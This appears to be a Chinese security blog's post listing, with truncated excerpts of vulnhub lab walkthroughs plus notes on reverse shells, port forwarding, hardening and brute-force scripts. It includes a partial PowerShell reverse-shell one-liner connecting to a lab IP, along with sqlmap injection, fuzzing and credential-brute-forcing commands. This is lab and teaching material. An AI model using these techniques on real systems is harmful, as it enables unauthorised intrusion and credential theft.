自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(34)
  • 收藏
  • 关注

原创 【vulnhub】Kioptrix_level2 靶机

1、信息收集1.1、虚拟机发现扫描使用netdiscover进行 arp 扫描,发现虚拟机 ip(192.168.57.140)Currently scanning: 192.168.191.0/16 | Screen View: Unique Hosts 3 Captured ARP Req/Rep pack

2021-02-01 13:43:05 455

原创 【vulnhub】Cherry靶机

1、信息收集1.1、网段扫描通过使用netdiscover 发现靶机ip为:192.168.57.1411.2、端口扫描使用nmap对靶机进行全端口扫描,同时启用服务探测、OS探测Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-25 14:12 CST

2021-02-01 13:41:10 416

原创 【vulnhub】BTRsys-2 靶机

1、信息收集1.1、端口扫描使用netdiscor或arp获取到靶机 ip:192.168.57.137使用nmap获取端口信息kali@kali:~$ sudo nmap -sSV -T4 -p 1-65535 -Pn -n 192.168.57.137Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( http

2021-01-29 11:35:05 1219

原创 【vulnhub】Chili 靶机

1、信息收集1.1、端口扫描已通过netdiscover发现靶机 ip:192.168.57.142Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-25 17:11 CSTNmap scan report for 192.168.57.142Host

2021-01-29 11:26:53 735 1

原创 【vulnhub】SickOs1.2 靶机

1、 信息收集1.1、主机发现使用netdiscover扫描靶机ipkali@kali:~$ sudo netdiscover -i eth16 Captured ARP Req/Rep packets, from 3 hosts. Total size: 360 _____________________________________________________________________________ IP At M

2021-01-29 11:18:19 526

原创 【vulnhub】yone靶机

1、信息收集##1.1、端口扫描及目录扫描未发现敏感端口及目录,仅开启22/80端口,存在未授权下载,/media下,存在上传接口,无法解析PHP文件2、权限获取web 端未发现入口,通过medusa爆破出yone密码:12345qwert通过searchsploit搜索到提权脚本,但靶机无gcc环境,无法编译2.1、敏感信息收集sudo -l 发现用户可以以sudo 权限运行restic程序,该程序可远程备份服务器文件2.2、root目录备份本地安装restic服务sudo

2021-01-26 10:16:45 455

原创 【vulnhub】【DC系列】DC9 - Knockd 靶机

1、信息收集使用netdiscover发现靶机 ip:192.168.57.155使用nmap发现仅开放80端口1.1、尝试注入访问页面后,发现search疑似存在SQL注入使用nmap测试sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: time-based blind

2021-01-26 10:12:43 857

原创 【vulnhub】【DC系列】DC8 - exim4 靶机

1、信息收集端口扫描,发现仅开放 22/80端口,运行的CMS为drupal 72、SQL注入访问一下页面,疑似存在注入# sqlmap测试注入$ sqlmap -u http://192.168.57.154/?nid=3 --dbs --batch ___ __H__

2021-01-26 10:08:41 373

原创 【vulnhub】【DC系列】DC7 - Drupal drush靶机

1、信息收集使用netdiscover发现靶机 ip 为:192.168.57.153nmap扫描发现开放有 20/80端口,运行的CMS 为 Drupal 8访问页面提示从其他入口下手页面上存在 Twitter 账号,搜索可发现 github 地址此处直接根据Twitter 账号 搜索 github,得到仓库地址dc7-user存在config.php文件,里面记录有用户名和密码,尝试使用该用户名登陆服务器<?php $servername = "localhost"; $us

2021-01-26 10:06:04 260

原创 【vulnhub】【DC系列】DC6 - WordPress Active monitor靶机

作者提示爆破的用户名需要通过筛选rockyou中含有k01的内容作为字典1、信息收集通过端口扫描及目录扫描,确认为 WordPress,靶机ip为:192.168.57.1521.1、应用扫描wpscan --url http://wordy -e u,vp,vt --plugins-detection=aggressive_______________________________________________________________ __ .

2021-01-26 10:03:58 669

原创 【vulnhub】【DC系列】DC5 - FUZZ 靶机

本靶机需要借助fuzz测试本地文件包含漏洞1、信息收集1.1、端口扫描nmap扫描后发现靶机仅开放的 80 端口存在突破可能,web界面无登陆功能1.2、fuzz访问页面 contact 界面填写内容后,url 中存在xxx=xxx的情况,可能存在文件包含、目录遍历$ wfuzz -u http://192.168.57.151/thankyou.php?FUZZ=FUZ2Z -w /usr/share/wfuzz/wordlist/general/common.txt -w /home.

2021-01-26 10:02:34 726 1

原创 【vulnhub】【DC系列】DC4 - 信息泄露 靶机

1、信息收集1.1、端口扫描仅开放22、80端口,无其它服务开放1.2、web扫描仅一个登陆页面,使用 burp 爆破 admin 账号,得到密码happy。登陆后,页面为一个命令执行按钮,使用post方式提交请求,需要借助 burp 的 repeater 模块1.3、信息收集通过 repeater 模块,可以查看 passwd 内容及 home 下用户目录jim 用户下存在信息泄露 mbox 及 backups 下的 old-passwords.bak 文件2、获取权限使用medu

2021-01-26 10:01:21 284

原创 【vulnhub】【DC系列】DC3 - Joomla 靶机

1、信息收集1.1、端口扫描sudo netdiscover -i eth0 发现靶机 ip:192.168.57.149$ nmap -sSV -p 1-65535 --open -T4 -Pn -n -A --version-intensity=9 -oN /home/kali/Desktop/nmap_scan/192.168.57.149.txt 192.168.57.149Nmap scan report for 192.168.57.149Host is up (0.0013s l

2021-01-26 09:59:00 1953

原创 【vulnhub】【DC系列】DC2 - WordPress 靶机

1、信息收集1.1、端口扫描netdiscover发现靶机ip : 192.168.57.148nmap -sSV -A -Pn -n -p 1-65535 --version-intensity 9 192.168.57.148Nmap scan report for 192.168.57.148Host is up (0.00100s latency).Not shown: 65533 closed portsPORT STATE SERVICE VERSION80/tcp

2021-01-26 09:54:14 788

原创 【vulnhub】【DC系列】DC1-Drupal 靶机

1、信息收集1.1、端口扫描使用nmap对端口进行扫描,发现存在 80 端口开放,使用的 CMS 为 Drupal 7 (来自查看主页源代码)1.2、漏洞信息收集searchsploit发现 Drupal 7 存在 SQL 注入等漏洞,本次先使用 SQL 注入添加管理员账号kali@kali:~$ searchsploit Drupal 7.0----------------------------------------------------------------------------

2021-01-26 09:52:10 382

原创 【信息安全】反弹shell

1、windows-powershell反弹shellkali作为服务端,windows使用powershell连接kali,并将自己的shell给kaliwindows端$client = New-Object System.Net.Sockets.TCPClient('192.168.57.200',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($byte

2020-12-02 16:51:22 212

原创 【信息安全】端口转发

一、SSH 端口转发篇1、基于ssh实现本地端口转发,外网同内网主机间的通信kali 已拿下 server1 的 ssh 权限,server1 和 server2 之间可以直接通信,且已经拿下 server2,kali 无法直接和 server2 通信 。通过端口转发,实现 kali 和 server 2 的直接通信1.1、需要在 attack kali 上配置的内容配置完成后,访问 kali 445 端口的流量将通过 ssh 转发到 server2 的 445 端口上# 在 kali

2020-12-02 16:50:36 607

原创 【信息安全】解析漏洞

1、nginx解析漏洞1.1、nginx 文件解析漏洞nginx 文件解析漏洞是 nginx 中 PHP 配置不当而造成,与 nginx 版本无关。在高版本的 PHP 中,由于 security.limit_extensions 的引入,该漏洞难以再被利用。 当请求中的 url 中路径名以 *.php 结尾,则 nginx 不管该文件是否存在,直接交给 PHP 处理。1.2、nginx %00 截断漏洞受该漏洞影响的 nginx 版本为0.5、0.6、0.7 ~ 0.7.65、0.8 ~ 0

2020-12-02 16:49:33 218

原创 【信息安全】安全加固

1、web组件安全1.1、Nginx安全1.1.1、关闭列目录默认情况下需要关闭该功能,除非提供下载等;检查 autoindex 开关是否打开,nginx 配置文件中搜索 autoindex,确保 autoindex 配置为off;1.1.2、关闭版本号显示关闭版本号显示后,错误页面 http response server 字段将不会显示 Nginx 版本 server { server_tokens off; }1.1.3、访问控制1.1.3.1、资源访问控

2020-12-02 16:48:56 3286

原创 【信息安全】工具篇--子域名收集

工具篇–子域名收集# 导入模块import sysfrom threading import Threadfrom urllib.parse import urlparseimport requestsfrom bs4 import BeautifulSoup# bing搜索子域名def bing_search(site, page): headers = { 'User-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64;

2020-11-03 15:10:59 896

原创 【信息安全】暴力破解-Python工具篇

在对pikachu靶场的暴力破解进行测试时,我们可以使用burpsuite进行爆破,也可使用Python脚本进行自动化爆破以下内容主要记录本次使用Python进行暴力破解的思路:通过burpsuite进行截断,获取客户提交的http请求信息:通过burpsuite截断信息,我们可以获取cookie及post提交的字段信息;根据获取到的信息编写Python脚本:import requestsfrom bs4 import BeautifulSoups = requests.session(

2020-10-19 22:34:42 851

原创 【Python】常用算法

穷举法# 百钱百鸡"""公鸡5元一只,母鸡3元一只,小鸡1元三只用100元买100只鸡,问公鸡、母鸡、小鸡各多少只"""for x in range(20): for y in range(33): z = 100 - x - y if 5 * x + 3 * y + z // 3 == 100 and z % 3 == 0: print(x, y, z)'''五人分鱼:ABCDE五人在某天夜里合伙捕鱼,最后疲惫不堪各自睡觉

2020-10-11 21:38:31 263

原创 【Python】排序算法和查找算法

排序算法(选择、冒泡和归并)# 简单选择排序,从小到大排列def select_sort(items, comp=lambda x, y: x < y): items = items[:] for i in range(len(items) - 1): min_index = i for j in range(i + 1, len(items)): if comp(items[j], items[min_index]):

2020-10-11 16:36:27 163

原创 【Python】巧借模块完成信息处理小技巧整理

找出列表或字典中最大或最小的元素import heapqlist1 = [34, 2, 5, 12, 99, 87, 63, 58, 78, 88, 92]list2 = [ {'name': 'IBM', 'shares': 100, 'price': 91.1}, {'name': 'AAPL', 'shares': 50, 'price': 543.22}, {'name': 'FB', 'shares': 200, 'price': 21.09}, {'name

2020-10-11 15:22:42 106

原创 【Python】获取绝对路径中的文件名

匹配d:\count.sh中count字段pattern = re.compile(r’([^<>/\|:""*?]+).\w+$’)等同于os.path.splitext(“d:\count.sh”)[0].split(’\’)[1]+os.path.splitext(“d:\count.sh”)[1]匹配d:\count.sh中count.sh字段pattern = re.compile(r’([^<>/\|:""*?]+.\w+$)’)由此可见,通过os模块虽然可以

2020-10-09 14:45:06 1549

原创 【dvwa】--登陆页爆破

闲来无事,决定是不是Python爆破dvwa登陆界面代码如下:import datetimeimport requestsfrom bs4 import BeautifulSoupdef Login_brute(filename): # 第一步,获取网页的csrf_token url = 'http://192.168.57.200/login.php' # 用于会话保持 s = requests.Session() req = s.get(url)

2020-09-07 17:23:01 663

原创 【信息安全】pikachu-SQL注入篇

数字型注入使用 1 or 1=1#探测,使用burpsuite截断post请求,修改提交的请求使用 1 or 1=2#探测,使用burpsuite截断post请求,修改提交的请求说明该处存在SQL注入接下来需要使用order by 判断列数oder by 2返回结果正常,说明只有2列确认列数后,可使用union select获取数据库名、用户名1 union select database(),user()#通过information_schema获取当前数据库表名根据表名

2020-09-02 15:16:07 357

原创 [kali]vim鼠标右键无法粘贴处理

在使用xshell连接kali,vim编辑文件发现鼠标右键无法粘贴,进入到visual模式;百度“vim 鼠标右键visual”,几乎都是修改/etc/vim/vimrc文件,添加如下内容,尝试多次未果,也重启过多次。甚至新建~/.vimrc文件,添加以下内容,仍然没有作用。if has('mouse') set mouse-=aendif再次百度“debian vim visual”,发现另一种修改方法,修改vim默认配置文件,找到上述内容vim /usr/share/vim/vimxx/de

2020-08-12 12:29:55 1509

原创 【dvwa】--SQL注入

为了准备跑路,练习ing。SQL注入篇LOW级别先上源码<?phpif( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysql_query(

2020-08-11 15:41:19 177

原创 利用go执行nmap命令

如题,针对nmap探测任务,尤其是批量探测的情况下。我们可以用脚本的方式代替手工package mainimport ( "fmt" "os/exec")func main() {cmd,err:=exec.Command("nmap","-sV","-sT","-p","22","127.0.0.1").Output()if err!=nil{ fmt.Println(err)}fmt.Println(string(cmd))}...

2020-08-07 17:31:13 1388

原创 go语言判断http响应包中是否包含特定字符串

在使用http探测网站的过程中,需要判断响应内容是否有预期内容。如是乎根据网上内容,利用go编写了一个探测脚本样例package mainimport ( "fmt" "io/ioutil" "net/http" "strings")func main() { //创建http客户端 client:=http.Client{} //创建http请求内容 request,_:=http.NewRequest("GET","https://www.example.com",nil)

2020-08-07 17:29:07 792

原创 Tomcat管理界面密码爆破

burpsuite爆破tomcat管理密码浏览器访问tomcat管理界面,使用burpsuite截断,并输入密码,basic编码后的密码为(admin:admin)将截断的请求发送到intruder中,并对密码字段添加变量标注:设置payload字段设置payload编码方式为base64,同时去掉payload的正则匹配burp爆破成功msf爆破tomcat管理密码(推荐方式)msf5 > use auxiliary/scanner/http/tomcat_mgr_l

2020-07-28 10:17:12 2403

原创 自用shell命令

留存~以备后续不时之需查看网卡信息ifconfig [eth0] # 查看网卡信息(可能需要安装net-tools)ip addr show # 查看网卡信息进程相关ps -ef | aux # 查看进程信息kill -9 进程id # 结束进程top # 查看进程资源占用情况查看网络连接netstat -taunlp # 查看网络连接信息用户相关useradd tom # 添加用户passwd tom # 修改tom密码userdel tom -

2020-07-24 15:03:35 71

原创 【信息安全】windows信息收集

本文章主要记录常用的Windows CMD命令关闭Windows防火墙netsh firewall set opmode disable # windows server 2003版netsh advfirewall set allprofiles state off # windows server 2008及以上版本可用开启远程桌面wmic path win32_terminalservicesetting where (__class !="") call setallowtsco

2020-07-24 14:36:43 280

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除